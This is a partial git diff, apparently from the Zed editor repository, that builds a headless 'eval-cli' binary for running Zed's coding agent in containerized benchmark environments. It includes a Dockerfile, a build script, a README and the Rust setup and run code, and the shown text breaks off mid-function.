sync::Arc}; - -#[derive(Debug, Default, Clone, Serialize, Deserialize)] -pub struct ToolMetrics { - pub use_counts: HashMap, u32>, - pub failure_counts: HashMap, u32>, -} - -impl ToolMetrics { - pub fn insert(&mut self, tool_name: Arc, succeeded: bool) { - *self.use_counts.entry(tool_name.clone()).or_insert(0) += 1; - if !succeeded { - *self.failure_counts.entry(tool_name).or_insert(0) += 1; - } - } - - pub fn merge(&mut self, other: &ToolMetrics) { - for (tool_name, use_count) in &other.use_counts { - *self.use_counts.entry(tool_name.clone()).or_insert(0) += use_count; - } - for (tool_name, failure_count) in &other.failure_counts { - *self.failure_counts.entry(tool_name.clone()).or_insert(0) += failure_count; - } - } - - pub fn is_empty(&self) -> bool { - self.use_counts.is_empty() && self.failure_counts.is_empty() - } -} - -impl Display for ToolMetrics { - fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { - let mut failure_rates: Vec<(Arc, f64)> = Vec::new(); - - for (tool_name, use_count) in &self.use_counts { - let failure_count = self.failure_counts.get(tool_name).cloned().unwrap_or(0); - if *use_count > 0 { - let failure_rate = failure_count as f64 / *use_count as f64; - failure_rates.push((tool_name.clone(), failure_rate)); - } - } - - // Sort by failure rate descending - failure_rates.sort_by(|a, b| b.1.partial_cmp(&a.1).unwrap_or(std::cmp::Ordering::Equal)); - - // Table dimensions - let tool_width = 30; - let count_width = 10; - let rate_width = 10; - - // Write table top border - writeln!( - f, - "┌{}┬{}┬{}┬{}┐", - "─".repeat(tool_width), - "─".repeat(count_width), - "─".repeat(count_width), - "─".repeat(rate_width) - )?; - - // Write header row - writeln!( - f, - "│{:^30}│{:^10}│{:^10}│{:^10}│", - "Tool", "Uses", "Failures", "Rate" - )?; - - // Write header-data separator - writeln!( - f, - "├{}┼{}┼{}┼{}┤", - "─".repeat(tool_width), - "─".repeat(count_width), - "─".repeat(count_width), - "─".repeat(rate_width) - )?; - - // Write data rows - for (tool_name, failure_rate) in failure_rates { - let use_count = self.use_counts.get(&tool_name).cloned().unwrap_or(0); - let failure_count = self.failure_counts.get(&tool_name).cloned().unwrap_or(0); - writeln!( - f, - "│{:<30}│{:^10}│{:^10}│{:^10}│", - tool_name, - use_count, - failure_count, - format!("{}%", (failure_rate * 100.0).round()) - )?; - } - - // Write table bottom border - writeln!( - f, - "└{}┴{}┴{}┴{}┘", - "─".repeat(tool_width), - "─".repeat(count_width), - "─".repeat(count_width), - "─".repeat(rate_width) - )?; - - Ok(()) - } -} diff --git a/crates/eval_cli/.gitignore b/crates/eval_cli/.gitignore new file mode 100644 index 0000000000000000000000000000000000000000..083ef6e3d354cb335e59916071199149d11965be --- /dev/null +++ b/crates/eval_cli/.gitignore @@ -0,0 +1,3 @@ +**/jobs +**/*.egg-info +**/__pycache__ diff --git a/crates/eval/Cargo.toml b/crates/eval_cli/Cargo.toml similarity index 63% rename from crates/eval/Cargo.toml rename to crates/eval_cli/Cargo.toml index a8917181a1253dea614a02bfaa799ace0ee6ba64..cac5dc6aa28fa9dfa9b7d41caf0db125daf596dc 100644 --- a/crates/eval/Cargo.toml +++ b/crates/eval_cli/Cargo.toml @@ -1,70 +1,51 @@ [package] -name = "eval" +name = "eval_cli" version = "0.1.0" publish.workspace = true edition.workspace = true license = "GPL-3.0-or-later" -default-run = "eval" [lints] workspace = true [[bin]] -name = "eval" -path = "src/eval.rs" - -[[bin]] -name = "explorer" -path = "src/explorer.rs" +name = "eval-cli" +path = "src/main.rs" [dependencies] acp_thread.workspace = true -agent = { workspace = true, features = ["eval"] } +agent.workspace = true agent-client-protocol.workspace = true -agent_settings.workspace = true agent_ui.workspace = true anyhow.workspace = true -async-trait.workspace = true -buffer_diff.workspace = true -chrono.workspace = true clap.workspace = true client.workspace = true -collections.workspace = true +ctrlc = { version = "3.5", features = ["termination"] } +db.workspace = true debug_adapter_extension.workspace = true -dirs.workspace = true -dotenvy.workspace = true env_logger.workspace = true extension.workspace = true +feature_flags.workspace = true fs.workspace = true futures.workspace = true gpui.workspace = true gpui_platform.workspace = true gpui_tokio.workspace = true -handlebars.workspace = true language.workspace = true language_extension.workspace = true language_model.workspace = true language_models.workspace = true languages = { workspace = true, features = ["load-grammars"] } -markdown.workspace = true node_runtime.workspace = true -pathdiff.workspace = true paths.workspace = true -pretty_assertions.workspace = true project.workspace = true prompt_store.workspace = true -regex.workspace = true -rand.workspace = true release_channel.workspace = true reqwest_client.workspace = true serde.workspace = true serde_json.workspace = true settings.workspace = true shellexpand.workspace = true -telemetry.workspace = true terminal_view.workspace = true -toml.workspace = true -unindent.workspace = true util.workspace = true -uuid.workspace = true watch.workspace = true diff --git a/crates/eval_cli/Dockerfile b/crates/eval_cli/Dockerfile new file mode 100644 index 0000000000000000000000000000000000000000..06593a124fe61c50f36c1c3e88f2a0b7443604d3 --- /dev/null +++ b/crates/eval_cli/Dockerfile @@ -0,0 +1,50 @@ +# Build eval-cli for Linux. +# +# Usage (from the zed repo root): +# docker build --platform linux/amd64 -f crates/eval_cli/Dockerfile -t eval-cli-builder . +# docker cp "$(docker create eval-cli-builder)":/eval-cli ./target/eval-cli +# +# Or use the helper script: +# crates/eval_cli/script/build-linux + +FROM rust:1.94.1 AS builder + +WORKDIR /app + + # Pre-install the toolchain specified in rust-toolchain.toml so it is cached. +RUN rustup toolchain install 1.94.1 --profile minimal \ + --component rustfmt --component clippy --component rust-analyzer --component rust-src \ + --target wasm32-wasip2 --target wasm32-unknown-unknown --target x86_64-unknown-linux-musl --target x86_64-unknown-linux-gnu + +# Install build tools. cmake + build-essential are needed for vendored C +# libraries (libgit2-sys, zstd-sys, libsqlite3-sys). No audio/GUI -dev +# packages required — eval-cli runs headless with those features disabled. +# +# cargo-zigbuild cross-compiles against musl libc, producing a fully +# static binary that runs on any Linux distro (glibc or musl / Alpine). +RUN apt-get update && apt-get install -y --no-install-recommends \ + cmake \ + build-essential \ + curl \ + xz-utils \ + && rm -rf /var/lib/apt/lists/* + +RUN mkdir -p /opt/zig \ + && curl -fsSL https://ziglang.org/download/0.15.2/zig-x86_64-linux-0.15.2.tar.xz \ + | tar -xJ -C /opt/zig --strip-components=1 \ + && ln -s /opt/zig/zig /usr/local/bin/zig + +RUN cargo install --locked cargo-zigbuild + +COPY . . + +RUN --mount=type=cache,target=/usr/local/cargo/registry \ + --mount=type=cache,target=/usr/local/cargo/git \ + --mount=type=cache,target=/app/target \ + cargo zigbuild --release --package eval_cli \ + --target x86_64-unknown-linux-musl && \ + cp /app/target/x86_64-unknown-linux-musl/release/eval-cli /eval-cli && \ + strip /eval-cli + +FROM scratch +COPY --from=builder /eval-cli /eval-cli diff --git a/crates/eval_cli/Dockerfile.dockerignore b/crates/eval_cli/Dockerfile.dockerignore new file mode 100644 index 0000000000000000000000000000000000000000..419f92f9c9b6dad52f04c9ad39e031a7405f2a4b --- /dev/null +++ b/crates/eval_cli/Dockerfile.dockerignore @@ -0,0 +1,21 @@ +.git +.github +**/.gitignore +**/.gitkeep +.gitattributes +.mailmap +**/target +zed.xcworkspace +.DS_Store +compose.yml +plugins/bin +script/node_modules +styles/node_modules +crates/collab/static/styles.css +vendor/bin +assets/themes/ +**/jobs + +**/*.egg-info +**/__pycache__ +**/.venv diff --git a/crates/assistant_text_thread/LICENSE-GPL b/crates/eval_cli/LICENSE-GPL similarity index 100% rename from crates/assistant_text_thread/LICENSE-GPL rename to crates/eval_cli/LICENSE-GPL diff --git a/crates/eval_cli/README.md b/crates/eval_cli/README.md new file mode 100644 index 0000000000000000000000000000000000000000..a9952bbf4fe1066a78acaad15bfab10d0cee098d --- /dev/null +++ b/crates/eval_cli/README.md @@ -0,0 +1,108 @@ +# eval-cli + +Headless CLI binary for running Zed's agent in evaluation/benchmark +environments. Designed to work inside containerized environments like +[Harbor](https://harborframework.com/) where the repository is already +checked out and API keys are provided via environment variables. + +Uses the same `NativeAgent` + `AcpThread` pipeline as the production Zed +editor — full agentic loop with tool calls, subagents, and retries, just +without a GUI. + +## Building + +### Native (for local testing on the same OS) + +``` +cargo build --release -p eval_cli +``` + +### Cross-compile for Linux x86_64 (from macOS or other hosts) + +Harbor containers run Linux x86_64. Use the Docker-based build script: + +``` +crates/eval_cli/script/build-linux +``` + +This produces `target/eval-cli` (an x86_64 Linux ELF binary). You can +also specify a custom output path: + +``` +crates/eval_cli/script/build-linux --output ~/bin/eval-cli-linux +``` + +## Standalone usage + +``` +eval-cli \ + --workdir /testbed \ + --model anthropic/claude-sonnet-4-6-latest \ + --instruction "Fix the bug described in..." \ + --timeout 600 \ + --output-dir /logs/agent +``` + +Reads API keys from environment variables (`ANTHROPIC_API_KEY`, +`OPENAI_API_KEY`, etc.). Writes `result.json`, `thread.md`, and +`thread.json` to the output directory. + +### Exit codes + +| Code | Meaning | +| ---- | ---------------------------------- | +| 0 | Agent finished | +| 1 | Error (model/auth/runtime failure) | +| 2 | Timeout | +| 3 | Interrupted (SIGTERM/SIGINT) | + +## Harbor integration + +The `zed_eval/` directory contains a Python package that +implements Harbor's `BaseInstalledAgent` interface, allowing eval-cli to +be used with `--agent-import-path` without modifying Harbor's source code. + +### Setup + +``` +pip install -e crates/eval_cli/harbor/ +``` + +### Running with a local binary + +Build for Linux first, then pass the binary path: + +``` +crates/eval_cli/script/build-linux + +harbor run -d "swebench_verified@latest" \ + --agent-import-path zed_eval.agent:ZedAgent \ + --ae binary_path=target/eval-cli \ + -m anthropic/claude-sonnet-4-6-latest +``` + +The agent uploads the binary into the container during setup — no +download URL needed during local iteration. + +### Running with a download URL + +For CI or when the binary is hosted somewhere: + +``` +harbor run -d "swebench_verified@latest" \ + --agent-import-path zed_eval.agent:ZedAgent \ + --ak download_url=https://example.com/eval-cli \ + -m anthropic/claude-sonnet-4-6-latest +``` + +### Setting a timeout + +Pass `EVAL_CLI_TIMEOUT` via `--ae`: + +``` +harbor run -d "swebench_verified@latest" \ + --agent-import-path zed_eval.agent:ZedAgent \ + --ak binary_path=target/eval-cli \ + --ae EVAL_CLI_TIMEOUT=600 \ + -m anthropic/claude-sonnet-4-6-latest +``` diff --git a/crates/eval/build.rs b/crates/eval_cli/build.rs similarity index 89% rename from crates/eval/build.rs rename to crates/eval_cli/build.rs index 9ab40da0fb0ca880cecc3a87d5a9e95172dcb6ec..0180e9036fbd049ba5a9e5b455ec1c017cd700e3 100644 --- a/crates/eval/build.rs +++ b/crates/eval_cli/build.rs @@ -10,5 +10,6 @@ fn main() { .expect("Invalid version format") .trim() .trim_matches('"'); + println!("cargo:rerun-if-changed=../zed/Cargo.toml"); println!("cargo:rustc-env=ZED_PKG_VERSION={}", version); } diff --git a/crates/eval_cli/script/build-linux b/crates/eval_cli/script/build-linux new file mode 100755 index 0000000000000000000000000000000000000000..dbb1d32668e9e3347a98de423521985059cbbbff --- /dev/null +++ b/crates/eval_cli/script/build-linux @@ -0,0 +1,59 @@ +#!/usr/bin/env bash +# +# Build eval-cli for x86_64 Linux from any host (macOS, Linux, etc.) +# using Docker + cargo-zigbuild. Targets musl libc, producing a fully +# static binary that runs on any Linux distro (glibc or musl / Alpine). +# The resulting binary is placed at the path printed on completion +# (default: target/eval-cli). +# +# Usage: +# crates/eval_cli/script/build-linux [--output PATH] +# +# Examples: +# crates/eval_cli/script/build-linux +# crates/eval_cli/script/build-linux --output ~/bin/eval-cli +# +# Prerequisites: Docker must be installed and running. + +set -euo pipefail + +SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)" +REPO_ROOT="$(cd "$SCRIPT_DIR/../../.." && pwd)" +OUTPUT="${REPO_ROOT}/target/eval-cli" + +while [[ $# -gt 0 ]]; do + case $1 in + --output) + OUTPUT="$2" + shift 2 + ;; + *) + echo "Unknown option: $1" >&2 + exit 1 + ;; + esac +done + +cd "$REPO_ROOT" + +IMAGE_TAG="eval-cli-builder" + +echo "Building eval-cli for x86_64-unknown-linux-musl (static binary)..." +echo " Repo root: $REPO_ROOT" +echo " Output: $OUTPUT" +echo "" + +docker build \ + --platform linux/amd64 \ + -f crates/eval_cli/Dockerfile \ + -t "$IMAGE_TAG" \ + . + +CONTAINER_ID=$(docker create "$IMAGE_TAG" /eval-cli) +mkdir -p "$(dirname "$OUTPUT")" +docker cp "$CONTAINER_ID":/eval-cli "$OUTPUT" +docker rm "$CONTAINER_ID" > /dev/null + +echo "" +echo "Built successfully: $OUTPUT" +echo " $(file "$OUTPUT")" diff --git a/crates/eval_cli/src/headless.rs b/crates/eval_cli/src/headless.rs new file mode 100644 index 0000000000000000000000000000000000000000..0ddd99e8f8abd9dbd73e1d7461526f3e7cb24f11 --- /dev/null +++ b/crates/eval_cli/src/headless.rs @@ -0,0 +1,136 @@ +use std::path::PathBuf; +use std::sync::Arc; + +use client::{Client, ProxySettings, RefreshLlmTokenListener, UserStore}; +use db::AppDatabase; +use extension::ExtensionHostProxy; +use fs::RealFs; +use gpui::http_client::read_proxy_from_env; +use gpui::{App, AppContext as _, Entity}; +use gpui_tokio::Tokio; +use language::LanguageRegistry; +use language_extension::LspAccess; +use node_runtime::{NodeBinaryOptions, NodeRuntime}; +use project::project_settings::ProjectSettings; +use prompt_store::PromptBuilder; +use release_channel::{AppCommitSha, AppVersion}; +use reqwest_client::ReqwestClient; +use settings::{Settings, SettingsStore}; +use util::ResultExt as _; + +pub struct AgentCliAppState { + pub languages: Arc, + pub client: Arc, + pub user_store: Entity, + pub fs: Arc, + pub node_runtime: NodeRuntime, +} + +pub fn init(cx: &mut App) -> Arc { + let app_commit_sha = option_env!("ZED_COMMIT_SHA").map(|s| AppCommitSha::new(s.to_owned())); + + let app_version = AppVersion::load( + env!("ZED_PKG_VERSION"), + option_env!("ZED_BUILD_ID"), + app_commit_sha, + ); + + release_channel::init(app_version.clone(), cx); + gpui_tokio::init(cx); + + let settings_store = SettingsStore::new(cx, &settings::default_settings()); + cx.set_global(settings_store); + + let user_agent = format!( + "Zed Agent CLI/{} ({}; {})", + app_version, + std::env::consts::OS, + std::env::consts::ARCH + ); + let proxy_str = ProxySettings::get_global(cx).proxy.to_owned(); + let proxy_url = proxy_str + .as_ref() + .and_then(|input| input.parse().ok()) + .or_else(read_proxy_from_env); + let http = { + let _guard = Tokio::handle(cx).enter(); + ReqwestClient::proxy_and_user_agent(proxy_url, &user_agent) + .expect("could not start HTTP client") + }; + cx.set_http_client(Arc::new(http)); + + let client = Client::production(cx); + cx.set_http_client(client.http_client()); + + let app_db = AppDatabase::new(); + cx.set_global(app_db); + + let git_binary_path = None; + let fs = Arc::new(RealFs::new( + git_binary_path, + cx.background_executor().clone(), + )); + + let mut languages = LanguageRegistry::new(cx.background_executor().clone()); + languages.set_language_server_download_dir(paths::languages_dir().clone()); + let languages = Arc::new(languages); + + let user_store = cx.new(|cx| UserStore::new(client.clone(), cx)); + + extension::init(cx); + + let (mut node_options_tx, node_options_rx) = watch::channel(None); + cx.observe_global::(move |cx| { + let settings = &ProjectSettings::get_global(cx).node; + let options = NodeBinaryOptions { + allow_path_lookup: !settings.ignore_system_version, + allow_binary_download: true, + use_paths: settings.path.as_ref().map(|node_path| { + let node_path = PathBuf::from(shellexpand::tilde(node_path).as_ref()); + let npm_path = settings + .npm_path + .as_ref() + .map(|path| PathBuf::from(shellexpand::tilde(&path).as_ref())); + ( + node_path.clone(), + npm_path.unwrap_or_else(|| { + let base_path = PathBuf::new(); + node_path.parent().unwrap_or(&base_path).join("npm") + }), + ) + }), + }; + node_options_tx.send(Some(options)).log_err(); + }) + .detach(); + let node_runtime = NodeRuntime::new(client.http_client(), None, node_options_rx); + + let extension_host_proxy = ExtensionHostProxy::global(cx); + debug_adapter_extension::init(extension_host_proxy.clone(), cx); + language_extension::init(LspAccess::Noop, extension_host_proxy, languages.clone()); + language_model::init(cx); + RefreshLlmTokenListener::register(client.clone(), user_store.clone(), cx); + language_models::init(user_store.clone(), client.clone(), cx); + languages::init(languages.clone(), fs.clone(), node_runtime.clone(), cx); + prompt_store::init(cx); + terminal_view::init(cx); + + let stdout_is_a_pty = false; + let prompt_builder = PromptBuilder::load(fs.clone(), stdout_is_a_pty, cx); + agent_ui::init( + fs.clone(), + prompt_builder, + languages.clone(), + true, + true, + cx, + ); + + Arc::new(AgentCliAppState { + languages, + client, + user_store, + fs, + node_runtime, + }) +} diff --git a/crates/eval_cli/src/main.rs b/crates/eval_cli/src/main.rs new file mode 100644 index 0000000000000000000000000000000000000000..f9ab1835f94327c72462ba7014bf7517d12ac55d --- /dev/null +++ b/crates/eval_cli/src/main.rs @@ -0,0 +1,574 @@ +//! Headless CLI binary for running Zed's agent in evaluation/benchmark environments. +//! +//! Designed to work inside containerized environments (like Harbor/termbench) where: +//! - The repository is already checked out at the working directory +//! - The model API key is provided via environment variables +//! - Results are written to an output directory (default: `/logs/agent/`) +//! +//! ## Usage +//! +//! ```text +//! eval-cli --workdir /testbed --model anthropic/claude-sonnet-4-6-latest \ +//! --instruction "Fix the bug described in..." --timeout 600 +//! ``` +//! +//! ## Output +//! +//! Writes to `--output-dir` (default `/logs/agent/`): +//! - `result.json` — structured result with status, timing, and token usage +//! - `thread.md` — full conversation as markdown +//! - `thread.json` — raw thread state as JSON +//! +//! ## Exit codes +//! +//! | Code | Meaning | +//! |------|---------| +//! | 0 | Agent finished | +//! | 1 | Error (model/auth/runtime failure) | +//! | 2 | Timeout | +//! | 3 | Interrupted (SIGTERM/SIGINT) | + +mod headless; + +use std::path::PathBuf; +use std::process; +use std::rc::Rc; +use std::str::FromStr; +use std::sync::Arc; +use std::sync::atomic::{AtomicBool, Ordering}; +use std::time::{Duration, Instant}; + +use acp_thread::AgentConnection as _; +use agent::{NativeAgent, NativeAgentConnection, Templates, ThreadStore}; +use agent_client_protocol as acp; +use anyhow::{Context, Result}; +use clap::Parser; +use feature_flags::FeatureFlagAppExt as _; + +use futures::{FutureExt, select_biased}; +use gpui::{AppContext as _, AsyncApp, Entity, UpdateGlobal}; +use language_model::{LanguageModelRegistry, SelectedModel}; +use project::Project; +use settings::SettingsStore; +use util::path_list::PathList; + +use crate::headless::AgentCliAppState; + +#[derive(Parser, Debug)] +#[command( + name = "eval-cli", + about = "Run Zed's agent headlessly in evaluation/benchmark environments" +)] +struct Args { + /// Output current environment variables as JSON to stdout. + /// Used internally by Zed's shell environment capture. + #[arg(long, hide = true)] + printenv: bool, + + /// Path to the repository working directory. Defaults to the current directory. + #[arg(long, default_value = ".")] + workdir: PathBuf, + + /// Instruction/prompt text. If omitted, read from --instruction-file or stdin. + #[arg(long)] + instruction: Option, + + /// Language model to use, in `provider/model` format. + #[arg(long, default_value = "anthropic/claude-sonnet-4-6-latest")] + model: String, + + /// Maximum wall-clock time in seconds for the agent run. + #[arg(long)] + timeout: Option, + + /// Directory for output artifacts (result.json, thread.md, thread.json). + #[arg(long, default_value = ".")] + output_dir: PathBuf, + + /// Disable staff mode (staff mode is enabled by default). + #[arg(long)] + no_staff: bool, + + /// Reasoning effort level for models that support thinking (low, medium, high). + /// Defaults to "high" for thinking-capable models. + #[arg(long)] + reasoning_effort: Option, + + /// Enable or disable extended thinking. Defaults to model auto-detection if omitted. + #[arg(long)] + thinking: Option, +} + +enum AgentOutcome { + Completed, + Timeout { seconds: u64 }, + Interrupted, +} + +#[derive(serde::Serialize)] +struct EvalResult { + status: String, + #[serde(skip_serializing_if = "Option::is_none")] + error: Option, + duration_secs: f64, + #[serde(skip_serializing_if = "Option::is_none")] + timeout_secs: Option, + model: String, + #[serde(skip_serializing_if = "Option::is_none")] + input_tokens: Option, + #[serde(skip_serializing_if = "Option::is_none")] + output_tokens: Option, + #[serde(skip_serializing_if = "Option::is_none")] + cache_creation_input_tokens: Option, + #[serde(skip_serializing_if = "Option::is_none")] + cache_read_input_tokens: Option, +} + +const EXIT_OK: i32 = 0; +const EXIT_ERROR: i32 = 1; +const EXIT_TIMEOUT: i32 = 2; +const EXIT_INTERRUPTED: i32 = 3; + +static TERMINATED: AtomicBool = AtomicBool::new(false); + +fn main() { + let args = Args::parse(); + + if args.printenv { + util::shell_env::print_env(); + return; + } + + env_logger::init(); + + ctrlc::set_handler(|| { + TERMINATED.store(true, Ordering::SeqCst); + }) + .expect("failed to set signal handler"); + + let instruction = read_instruction(&args).unwrap_or_else(|e| { + eprintln!("Error reading instruction: {e}"); + process::exit(EXIT_ERROR); + }); + + let workdir = args.workdir.canonicalize().unwrap_or_else(|e| { + eprintln!("Invalid --workdir {:?}: {e}", args.workdir); + process::exit(EXIT_ERROR); + }); + + let output_dir = args.output_dir.clone(); + if let Err(e) = std::fs::create_dir_all(&output_dir) { + eprintln!("Error creating output dir {}: {e}", output_dir.display()); + process::exit(EXIT_ERROR); + } + + let http_client = Arc::new(reqwest_client::ReqwestClient::new()); + let app = gpui_platform::headless().with_http_client(http_client); + + app.run(move |cx| { + let app_state = headless::init(cx); + cx.set_staff(!args.no_staff); + + let auth_tasks = LanguageModelRegistry::global(cx).update(cx, |registry, cx| { + registry + .providers() + .iter() + .map(|p| p.authenticate(cx)) + .collect::>() + }); + + let model_name = args.model.clone(); + let timeout = args.timeout; + let thinking_override = args.thinking; + let reasoning_effort = args.reasoning_effort.clone(); + + cx.spawn(async move |cx| { + futures::future::join_all(auth_tasks).await; + + let start = Instant::now(); + + let (outcome, token_usage) = run_agent( + &app_state, + &workdir, + &instruction, + &model_name, + timeout, + thinking_override, + reasoning_effort.as_deref(), + Some(&output_dir), + cx, + ) + .await; + + let duration = start.elapsed(); + + let (status, error, exit_code) = match &outcome { + Ok(AgentOutcome::Completed) => ("completed".to_string(), None, EXIT_OK), + Ok(AgentOutcome::Timeout { seconds }) => { + eprintln!("Timeout: agent exceeded {seconds}s time limit"); + ("timeout".to_string(), None, EXIT_TIMEOUT) + } + Ok(AgentOutcome::Interrupted) => { + eprintln!("Interrupted: received SIGTERM, saved partial output"); + ("interrupted".to_string(), None, EXIT_INTERRUPTED) + } + Err(e) => { + eprintln!("Error: {e:#}"); + ("error".to_string(), Some(format!("{e:#}")), EXIT_ERROR) + } + }; + + let result = EvalResult { + status, + error, + duration_secs: duration.as_secs_f64(), + timeout_secs: timeout, + model: model_name.clone(), + input_tokens: token_usage.as_ref().map(|u| u.input_tokens), + output_tokens: token_usage.as_ref().map(|u| u.output_tokens), + cache_creation_input_tokens: token_usage + .as_ref() + .filter(|u| u.cache_creation_input_tokens > 0) + .map(|u| u.cache_creation_input_tokens), + cache_read_input_tokens: token_usage + .as_ref() + .filter(|u| u.cache_read_input_tokens > 0) + .map(|u| u.cache_read_input_tokens), + }; + + match serde_json::to_string_pretty(&result) { + Ok(json) => { + if let Err(e) = std::fs::write(output_dir.join("result.json"), &json) { + eprintln!("Error writing result.json: {e:#}"); + } + eprintln!("[eval-cli] result: {json}"); + } + Err(e) => eprintln!("Error serializing result: {e:#}"), + } + + cx.update(|cx| cx.quit()); + process::exit(exit_code); + }) + .detach(); + }); +} + +fn read_instruction(args: &Args) -> Result { + let text = if let Some(text) = &args.instruction { + text.clone() + } else { + use std::io::Read; + let mut buf = String::new(); + std::io::stdin() + .read_to_string(&mut buf) + .context("reading instruction from stdin")?; + buf + }; + anyhow::ensure!(!text.trim().is_empty(), "instruction is empty"); + Ok(text) +} + +async fn run_agent( + app_state: &Arc, + workdir: &std::path::Path, + instruction: &str, + model_name: &str, + timeout: Option, + thinking_override: Option, + reasoning_effort: Option<&str>, + output_dir: Option<&std::path::Path>, + cx: &mut AsyncApp, +) -> (Result, Option) { + let setup_result: Result<()> = cx.update(|cx| { + let selected = SelectedModel::from_str(model_name).map_err(|e| anyhow::anyhow!("{e}"))?; + let registry = LanguageModelRegistry::global(cx); + let model = registry + .read(cx) + .available_models(cx) + .find(|m| m.id() == selected.model && m.provider_id() == selected.provider) + .ok_or_else(|| { + let available = registry + .read(cx) + .available_models(cx) + .map(|m| format!("{}/{}", m.provider_id().0, m.id().0)) + .collect::>() + .join(", "); + anyhow::anyhow!("Model {model_name} not found. Available: {available}") + })?; + + let supports_thinking = model.supports_thinking(); + + registry.update(cx, |registry, cx| { + registry.set_default_model( + Some(language_model::ConfiguredModel { + provider: registry + .provider(&model.provider_id()) + .context("Provider not found")?, + model, + }), + cx, + ); + anyhow::Ok(()) + })?; + + let enable_thinking = thinking_override.unwrap_or(supports_thinking); + let effort = if enable_thinking { + match reasoning_effort { + Some(level) => format!("\"{level}\""), + None => "\"high\"".to_string(), + } + } else { + "null".to_string() + }; + let provider_id = selected.provider.0.to_string(); + let model_id = selected.model.0.to_string(); + SettingsStore::update_global(cx, |store, cx| { + let settings = format!( + r#"{{ + "agent": {{ + "tool_permissions": {{"default": "allow"}}, + "default_model": {{ + "provider": "{provider_id}", + "model": "{model_id}", + "enable_thinking": {enable_thinking}, + "effort": {effort} + }} + }}, + "autosave": "off", + "format_on_save": "off" + }}" + "# + ); + store.set_user_settings(&settings, cx).ok(); + }); + + anyhow::Ok(()) + }); + + if let Err(e) = setup_result { + return (Err(e), None); + } + + let project = cx.update(|cx| { + Project::local( + app_state.client.clone(), + app_state.node_runtime.clone(), + app_state.user_store.clone(), + app_state.languages.clone(), + app_state.fs.clone(), + None, + project::LocalProjectFlags { + init_worktree_trust: false, + ..Default::default() + }, + cx, + ) + }); + + let worktree = project.update(cx, |project, cx| project.create_worktree(workdir, true, cx)); + let worktree = match worktree.await { + Ok(w) => w, + Err(e) => return (Err(e).context("creating worktree"), None), + }; + + let scan_result = worktree.update(cx, |tree, _cx| { + tree.as_local() + .context("expected local worktree") + .map(|local| local.scan_complete()) + }); + match scan_result { + Ok(future) => future.await, + Err(e) => return (Err(e), None), + }; + + let agent = cx.update(|cx| { + let thread_store = cx.new(|cx| ThreadStore::new(cx)); + NativeAgent::new( + thread_store, + Templates::new(), + None, + app_state.fs.clone(), + cx, + ) + }); + + let connection = Rc::new(NativeAgentConnection(agent.clone())); + let acp_thread = match cx + .update(|cx| { + connection + .clone() + .new_session(project, PathList::new(&[workdir]), cx) + }) + .await + { + Ok(t) => t, + Err(e) => return (Err(e).context("creating ACP session"), None), + }; + + let _subscription = cx.subscribe(&acp_thread, |acp_thread, event, cx| { + log_acp_thread_event(&acp_thread, event, cx); + }); + + let message = vec![acp::ContentBlock::Text(acp::TextContent::new( + instruction.to_string(), + ))]; + + let send_future = acp_thread.update(cx, |acp_thread: &mut acp_thread::AcpThread, cx| { + acp_thread.send(message, cx) + }); + + let timeout_future = if let Some(timeout_secs) = timeout { + futures::future::Either::Left( + cx.background_executor() + .timer(Duration::from_secs(timeout_secs)), + ) + } else { + futures::future::Either::Right(futures::future::pending::<()>()) + }; + + let sigterm_future = { + let executor = cx.background_executor().clone(); + async move { + while !TERMINATED.load(Ordering::Relaxed) { + executor.timer(Duration::from_millis(100)).await; + } + } + }; + + let outcome = select_biased! { + result = send_future.fuse() => match result { + Ok(Some(response)) => { + eprintln!("[eval-cli] stopped: {:?}", response.stop_reason); + if response.stop_reason == acp::StopReason::MaxTokens { + Err(anyhow::anyhow!("Model hit maximum token limit")) + } else { + Ok(AgentOutcome::Completed) + } + } + Ok(None) => { + eprintln!("[eval-cli] completed (no response)"); + Ok(AgentOutcome::Completed) + } + Err(e) => Err(e).context("agent run failed"), + }, + _ = sigterm_future.fuse() => { + eprintln!("[eval-cli] received SIGTERM, cancelling..."); + acp_thread.update(cx, |t: &mut acp_thread::AcpThread, cx| t.cancel(cx)).await; + Ok(AgentOutcome::Interrupted) + }, + _ = timeout_future.fuse() => { + acp_thread.update(cx, |t: &mut acp_thread::AcpThread, cx| t.cancel(cx)).await; + Ok(AgentOutcome::Timeout { seconds: timeout.unwrap_or(0) }) + } + }; + + let thread = cx.update(|cx| { + let session_id = acp_thread.read(cx).session_id().clone(); + connection.thread(&session_id, cx) + }); + + let cumulative_usage = if let Some(thread) = &thread { + let db_thread = thread.read_with(cx, |thread, cx| thread.to_db(cx)); + let db_thread = db_thread.await; + let usage = db_thread.cumulative_token_usage; + if usage.input_tokens > 0 || usage.output_tokens > 0 { + Some(usage) + } else { + None + } + } else { + None + }; + + let acp_usage = cx.update(|cx| { + acp_thread + .read(cx) + .token_usage() + .map(|usage| language_model::TokenUsage { + input_tokens: usage.input_tokens, + output_tokens: usage.output_tokens, + ..Default::default() + }) + }); + + let final_usage = cumulative_usage.or(acp_usage); + + if let (Some(thread), Some(dir)) = (&thread, output_dir) { + let markdown = thread.read_with(cx, |thread, _cx| thread.to_markdown()); + if let Err(e) = std::fs::write(dir.join("thread.md"), markdown) { + eprintln!("Error writing thread.md: {e:#}"); + } + + let db_thread = thread.read_with(cx, |thread, cx| thread.to_db(cx)); + let db_thread = db_thread.await; + match serde_json::to_string_pretty(&db_thread) { + Ok(json) => { + if let Err(e) = std::fs::write(dir.join("thread.json"), json) { + eprintln!("Error writing thread.json: {e:#}"); + } + } + Err(e) => eprintln!("Error serializing thread.json: {e:#}"), + } + } + + (outcome, final_usage) +} + +fn log_acp_thread_event( + acp_thread: &Entity, + event: &acp_thread::AcpThreadEvent, + cx: &mut gpui::App, +) { + match event { + acp_thread::AcpThreadEvent::NewEntry => { + let entries = acp_thread.read(cx).entries(); + if let Some(acp_thread::AgentThreadEntry::AssistantMessage(message)) = entries.last() { + for chunk in &message.chunks { + if let acp_thread::AssistantMessageChunk::Message { block } = chunk { + if let acp_thread::ContentBlock::Markdown { markdown } = block { + let text = markdown.read(cx).source().to_string(); + if !text.is_empty() { + eprint!("{text}"); + } + } + } + } + } + } + acp_thread::AcpThreadEvent::EntryUpdated(index) => { + let entries = acp_thread.read(cx).entries(); + if let Some(acp_thread::AgentThreadEntry::ToolCall(tool_call)) = entries.get(*index) { + if let Some(name) = &tool_call.tool_name { + match &tool_call.status { + acp_thread::ToolCallStatus::Completed => { + eprintln!("[tool] {name} ✓"); + } + acp_thread::ToolCallStatus::Failed => { + 